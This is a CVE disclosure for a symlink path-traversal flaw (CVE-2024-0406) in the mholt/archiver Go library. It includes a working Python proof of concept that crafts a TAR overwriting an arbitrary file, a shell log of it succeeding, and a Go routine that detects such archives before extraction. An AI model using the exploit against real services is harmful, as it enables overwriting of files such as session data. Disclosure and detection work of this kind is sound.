# CVE-2024-0406

A flaw was discovered in the mholt/archiver package. It allows an attacker to create a specially crafted **TAR** file which, when unpacked, may allow access to restricted files or directories. The issue can allow the creation or overwriting of files with the privileges of the user or application using the library.

Affected versions: >=3.0.0 <= 3.5.1

***

### PoC || GTFO

```bash
» python3 cve-2024-0406.py /tmp/sessions/admin/fake_session 
TAR file created at cve-2024-0406.tar with symlink pointing to /tmp/sessions/admin/fake_session

# Upload the file to a target that uses the Unarchive() function

root@5af68317d6cb:/app/unarchive/admin# ls -al
total 8
drwxr-xr-x 2 root root 4096 Jun  1 08:20 .
drwxr-xr-x 3 root root 4096 Jun  1 07:02 ..
lrwxrwxrwx 1 root root   32 Jun  1 08:20 x -> /tmp/sessions/admin/fake_session
root@5af68317d6cb:/app/unarchive/admin# cat /tmp/sessions/admin/fake_session
<some-file-content-here>
```

```python
import tarfile
import sys
import io

def create_tar(tar_path, symlink_target):
    with tarfile.open(tar_path, 'w') as tar:
        # Create a symlink entry './x' pointing to symlink_target
        symlink_info = tarfile.TarInfo(name='./x')
        symlink_info.type = tarfile.SYMTYPE
        symlink_info.linkname = symlink_target
        tar.addfile(symlink_info)
        
        # Optional: Add a file with the same name 'x'
        payload_content = b'<some-file-content-here>'
        payload_info = tarfile.TarInfo(name='x')
        payload_info.size = len(payload_content)
        tar.addfile(payload_info, io.BytesIO(payload_content))
        
if __name__ == "__main__":
    if len(sys.argv) < 2:
        print(f"Usage: {sys.argv[0]} <path_to_symlink>")
        sys.exit(1)
    
    symlink_target = sys.argv[1]
    tar_path = "cve-2024-0406.tar"

    create_tar(tar_path, symlink_target)
    print(f"TAR file created at {tar_path} with symlink pointing to {symlink_target}")

```
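A defender-side check for the archive layout shown above, added here as an example (not code from the original page or from mholt/archiver): it reads tar headers with Go's standard `archive/tar` before anything is unpacked and flags symlinks that leave the destination as well as entries that would be written through an earlier symlink. `auditTar`, `sampleTar` and the sample archive are names and data constructed for this illustration.

```go
package main

import (
	"archive/tar"
	"bytes"
	"fmt"
	"io"
	"path"
	"strings"
)

// auditTar reads headers only and reports unsafe symlinks and entries written through them.
func auditTar(r io.Reader) ([]string, error) {
	var findings, links []string // links: cleaned names of symlink entries seen so far
	for tr := tar.NewReader(r); ; {
		h, err := tr.Next()
		if err == io.EOF {
			return findings, nil
		} else if err != nil {
			return findings, err
		}
		name := path.Clean("/" + h.Name)[1:] // "./x" and "x" both become "x"
		for _, l := range links {
			if name == l || strings.HasPrefix(name, l+"/") {
				findings = append(findings, fmt.Sprintf("%q would be written through link %q", h.Name, l))
			}
		}
		if h.Typeflag == tar.TypeSymlink {
			dest := path.Join(path.Dir(name), h.Linkname) // where a relative target lands
			if path.IsAbs(h.Linkname) || dest == ".." || strings.HasPrefix(dest, "../") {
				findings = append(findings, fmt.Sprintf("symlink %q targets %q outside the destination", h.Name, h.Linkname))
			}
			links = append(links, name)
		}
	}
}

// sampleTar builds a constructed in-memory archive: symlink "./x" -> target, then an empty file.
func sampleTar(target, file string) *bytes.Buffer {
	buf := new(bytes.Buffer)
	tw := tar.NewWriter(buf)
	tw.WriteHeader(&tar.Header{Name: "./x", Typeflag: tar.TypeSymlink, Linkname: target})
	tw.WriteHeader(&tar.Header{Name: file, Typeflag: tar.TypeReg, Mode: 0o644})
	tw.Close()
	return buf
}

func main() {
	fmt.Println(auditTar(sampleTar("/tmp/sessions/admin/fake_session", "x")))
}
```

An application that accepts uploaded archives can run a check like this on the upload and reject it when any finding is returned, before handing the file to the extraction routine.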

